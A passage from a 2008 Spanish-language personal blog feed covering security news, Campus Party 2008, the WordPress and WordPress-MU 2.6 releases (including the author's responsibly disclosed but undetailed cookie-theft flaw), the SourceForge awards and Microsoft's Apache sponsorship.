utilizar y muy flexible" y con dificil solución, ya que es un fallo de arquitectura y no de programación lo que conlleva que el parche tardará en salir... o quizá no salga nunca.<br/><br/>* <a href="http://voices.washingtonpost.com/the-trail/2008/08/21/ohio_voting_machines_contained.html">Fabricante de máquinas de voto admite ahora "error" crítico después de 10 años.</a> Y ahora una <a href="http://xkcd.com/463/">viñeta divertida sobre el tema</a><br/><br/>* La BBC News publicó que varios portátiles llevados a la ISS (International Space Station) por astronautas de la NASA <a href="http://science.slashdot.org/article.pl?sid=08/08/27/1231224">están afectados por <a href="http://news.bbc.co.uk/1/hi/technology/7583805.stm">Gammima.AG.worm</a>. Al parecer no tienen conexión a la red, por lo que suponen que <a href="http://www.symantec.com/security_response/writeup.jsp?docid=2007-082706-1742-99&tabid=2">el gusano</a> subió a bordo por un disco flash usb.<br/><br/>A partir de mañana, vuelta al trabajo, empieza septiembre, todo tipo de promesas y coleccionables por doquier... pero volvemos con ganas!<br/><br/>Saludos!Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-76279359963418537832008-08-07T10:45:00.000-07:002009-09-18T09:58:01.119-07:00Resumen Campus Party 2008<a href='http://campus-party.es'><img src="http://blogs.ua.es/jgaliana/files/2008/08/1200997032_logocp.gif" alt="campus party" width="211" height="74" class="alignleft size-full wp-image-140" /></a>Hola,<br/><br/>Aunque ya acabó el domingo, hasta ahora no he encontrado el momento de postear un pequeño resumen y dar mi particular punto de vista sobre este evento tecnológico, para quien no lo conozca decir que es un evento al cual asisten más de 6000 personas y está repleto de actividades: conferencias, talleres, competiciones y mucho más y al que ya he asistido con anterioridad.<br/>En primer lugar, gracias a Héctor por darme una invitación y a mi jefe por darme un par de días para poder pasar por Valencia y disfrutar unos días de la Campus Party.<br/>Llegué ya tarde, puesto que empezaba el lunes día 28, y yo tenía libre jueves y viernes. En principio sólo iba por los talleres de Software Libre, pero nada más llegar había un gran número de conferencias interesantes.<br/>Me perdí algunas cosas interesantes como ver a Tim Berners Lee, considerado el padre de la Web, ya que el y su grupo desarrollaron lenguajes y protocolos que hoy día no podemos dejar de usar: HTML, HTTP, URL, etc <br/>En el área de desarrolladores destacaron conferencia sobre ruby on rails, videojuegos, y de algoritmos para inteligencia artificial.<br/>En el área de Google, asistió gente de Google España (un saludo desde aquí!), y varios ingenieros que trabajan en otros paises para dar conferencias técnicas. Se trataron muchos temas: Android, posibilidades de mapas con Google Earth, API de YouTube, Google Web Toolkit y FriendConnect, iGoogle, Summer of Code, etc, como siempre ... excelente y gente muy maja.<br/>En CampusBlog vino gente de mename, panoramio, tuenti, weblogsl, microsiervos, hipertextual.. y más, para hablar sobre web 2.0 y blogging.<br/><br/>Y por último el área que más me interesa, Software Libre, había varios personajes importantes invitados como Jon Hall, el director ejecutivo de Linux Internacional, o Tony Guntharp, uno de los fundadores de sourceforge, para hablar sobre la incitaiva de abrir este portal que alberga unos 100.000 proyectos alojados y más de un millón de usuarios registrados. Estuvo muy interesante la charla de Rasmus Lerdorf (creador de PHP), sobre optimizaciíon y seguridad en PHP. También se habló sobre seguridad y web 2.0. Así como desde el stand de Telefónica I+D una charla sobre redes seguida de un taller de Wireless que nos entretuvo varias horas...<br/>Sobre las otras áreas no tuve tiempo para poder pasarme, podeis consultar un listado de las actividades, conferencias, talleres, competiciones, etc, en la <a href="http://campus-party.es">página oficial</a> para todas las áreas.<br/>Aunque no tuve mucho tiempo y no soy muy dado a participar en competiciones...., le quité alguna hora al sueño para poder participar en una, y me volví para Alicante con 400 € "pa la saca" del 1º premio en el concurso de seguridad del área de Software Libre ¡genial! <br/>Además de aprender, conocer gente muy interesate (junto con saludar a ya conocidos..) y lo divertido que fué no puedo más que etiquetar la experiencia de muy positiva y espero poder pasarme otro año por Valencia.<br/><br/>Un Saludo!Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com5tag:blogger.com,1999:blog-665899775980305966.post-55786662916656965982008-08-06T15:13:00.000-07:002009-09-18T09:58:01.119-07:00WordPress 2.6 & Wordpress-MU (Multi-User) 2.6 is out!: Llamamiento a la
actualización para la rama MU<strong>Wordpress 2.6 'Tyner'</strong> (como siempre haciendo referencia a un músico de jazz), fué lanzado el 15 de julio con notables mejoras que hacen de él un CMS aún más potente. Entre ellas destacan la posibilidad de acceder a cualquier versión de un post, realizar comparaciones entre versiones y restaurar alguna si fuera necesario. Muy útil para blogs editados por varios autores.<br/><br/><a href='http://blogs.ua.es/jgaliana/files/2008/08/wordpress-26-control-de-versiones.png'><img src="http://blogs.ua.es/jgaliana/files/2008/08/wordpress-26-control-de-versiones.png" alt="wordpress-26-control-de-versiones" width="500" height="87" class="aligncenter size-full wp-image-138" /></a><br/><br/>Han incoportado una novedad "Press This!", y nos da la posibilidad de crear un bookmarklet en nuestro navegador y de esta manera hacer nuestro blogging más cómodo desde cualquier sitio de la web.<br/>Por ejemplo, como dice Matt en el blog, si haces click en "Press This" desde un sitio de YouTube, automáticamente extraerá el código embed del video, o si lo haces desde una página de Flickr hará muy sencillo añadir la imagen en un post.<br/><br/>También existen otras mejoras, como el soporte de Google Gears, la gestión de imágenes, previsualización de temas, versiones más rápidas de TinyMCE, jQuery y jQuery UI.<br/><br/>Otro punto donde han puesto especial atención es la seguridad. Cada vez más Wordpress se está enfocando hacía ser un software más seguro, ejemplos de esto son, la eliminación de los errores de la base de datos en la versión 2.3.2, o la integración de contraseñas salteadas y seguridad en las cookies en la versión 2.5. Esta vez en la versión 2.6 la gran novedad, es la desactivación por defecto de la publicación remota via la variedad de protocolos XML-RPC y Atom Publishing Protocol (aunque se puede activar de manera sencilla), sin duda, minimizar las funciones XML-RPC es un paso para combatir gran cantidad de ataques y evitamos la exposición de un potencial riesgo para la seguridad.<br/>Otro punto destacable es el soporte SSL completo en el núcleo, así como la capacidad de forzar SSL para aplicar seguridad al sitio.<br/><br/><a href="http://wordpress.org/development/2008/07/wordpress-26-tyner/">Podeis leer la lista de cambios completa de Wordpress 2.6 en el blog oficial escrito por Matt, así como un video explicando las mejoras.</a><br/><br/><br/>Ahora, hablaremos sobre <strong>Wordpress-MU 2.6 lanzada el 28 de julio. La versión Multi-Usuario basada en Wordpress 2.6</strong>, es el motor que usa la red wordpress.com así como muchas otras (incluida esta misma, iniciativa de la Universidad de Alicante). <br/>En primer lugar, decir que no os habeis perdido muchas versiones desde la versión 1.5.1, y es que esta fué la inmediantamente anterior. Han cambiado la numeración de 1.x a 2.x, para evitar la confusión y ajustarla a la de su software base: Wordpress.<br/>Con un gran número de mejoras entre las que destacan mejoras en la lucha contra spammers, nuevas funciones como get_id_from_blogname(), is_main_blog() y más sumadas a las nuevas características ya comentadas para Wordpress 2.6, <a href="http://ocaoimh.ie/2008/07/28/wordpress-mu-26/">os dejo la lista completa de cambios</a>, además Donncha (el desarrollador principal de la rama MU), <strong>ha tenido el detallazo de citarme en los agradecimientos.</strong><br/>Esta cita se debe, al igual que el título del post al <strong>descubrimiento de un fallo grave de seguridad, el cual permite robar las cookies del administrador</strong>, y que desvelaré de aquí a un mes. De aquí hasta que se revelen los detalles técnicos<strong> todos los administradores que hospeden Wordpress MU (en todas sus versiones, < 2.6) deben actualizar para solucionar el problema a la nueva verisón 2.6.</strong> <br/><br/>Nada más descubrir la vulnerabilidad tanto los desarrolladores de Wordpress-MU como los administradores de esta red en la Universidad de Alicante fueron avisados, proporcionandoles un parche para corregirla.<br/><br/>Dentro de un més, publicaré los detalles técnicos, así que hasta entonces..Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com13tag:blogger.com,1999:blog-665899775980305966.post-43804799078373144612008-08-06T11:36:00.000-07:002009-09-18T09:58:01.119-07:00SourceForge.net Community Choice Awards 2008<a href='http://blogs.ua.es/jgaliana/files/2008/08/sourceforge.png'><img src="http://blogs.ua.es/jgaliana/files/2008/08/sourceforge-300x37.png" alt="sourceforge" width="300" height="37" class="alignleft size-medium wp-image-135" /></a>Aunque unos días después pero ya estoy aquí de nuevo para cubrir las noticias más relevantes en el mundo del Software Libre, en este caso, le toca a los Premios SourceForge 2008.<br/><br/>Como mejor proyecto salió OpenOffice.org, que además ganó un total de 3 de los 12 galardones, también cabe destacar a phpMyAdmin, Wine, VLC, eMule y más, sin faltar Linux, que se llevó el premio "al software con más opciones de cambiar el mundo".<br/><a href="http://www.muycomputer.com/FrontOffice/ZonaPractica/Especiales/especialDet/_wE9ERk2XxDA0vdjPfH3oxoRM-A7dfAvcSpg7Hx7UWnKtgjjjX8eiP2xpzXg-Hg1m"><br/>Aquí os dejo el listado completo de los 12 premios</a><br/><br/>Como nota, decir que OpenOffice 3 está cerca, y yo ya he estado probando la beta 2 dejandome con un buen sabor de boca, destacando el soporte para Mac OS X Leopard (Intel-Aqua) donde han mejorado muchísimo, (interfaz aqua, soporte copy&paste, arrastrar y soltar, etc), tanto que ya me cuestiono si tiene sentido mantener el proyecto NeoOffice..., que opinais?<br/><br/><a href='http://openoffice.org'><img src="http://blogs.ua.es/jgaliana/files/2008/08/premios-sourceforge-openofficeorg-300x214.jpg" alt="premios-sourceforge-openofficeorg" width="300" height="214" class="aligncenter size-medium wp-image-136" /></a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-83678108938127388002008-07-29T13:39:00.000-07:002009-09-18T09:58:01.119-07:00Nuevo patrocinador Platinum de la Fundación Apache...<a href="http://apache.org"><img class="alignleft size-full wp-image-132" src="http://blogs.ua.es/jgaliana/files/2008/07/apache.png" alt="apache" width="237" height="76" /></a>Leo con asombro que Microsoft, se ha convertido en uno de los patrocinadores Platinum de la Fundación Apache, uniendose a Google y Yahoo, que ya lo eran anteriormente.<br/>Extraño paso de esta compañía, que hace poco lanzaba FUDs contra el software libre. La fundación Apache, mantiene muchos proyectos de software libre destacados por su excelente calidad, entre los que se encuentra, su software estrella, el servidor web Apache, competidor del Internet Information Server de MS, y que además, tiene más couta de mercado.<br/><br/>Total, que son 100.000 $ al año que pagan... y ellos pensarán, bah, una miseria y quedamos bien... y qué bien queda el logo en su página!<br/><br/><a href="http://blogs.ua.es/jgaliana/files/2008/07/patrocinadores_apache.png"><img class="aligncenter size-medium wp-image-131" src="http://blogs.ua.es/jgaliana/files/2008/07/patrocinadores_apache-250x300.png" alt="patrocinadores_apache" width="250" height="300" /></a><br/><br/>Además de este paso, Sam Ramji (Director de estrategia para plataformas de Microsoft) <a href="http://port25.technet.com/archive/2008/07/25/oscon2008.aspx">ha publicado en su blog</a> que están contribuyendo con Adodb (una capa de acceso a datos usada por muchas aplicaciones libres, con licencia LGPL y BSD), para incoporar un driver nativo de MS SQL Server en PHP.<br/><br/>Que será lo próximo?Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0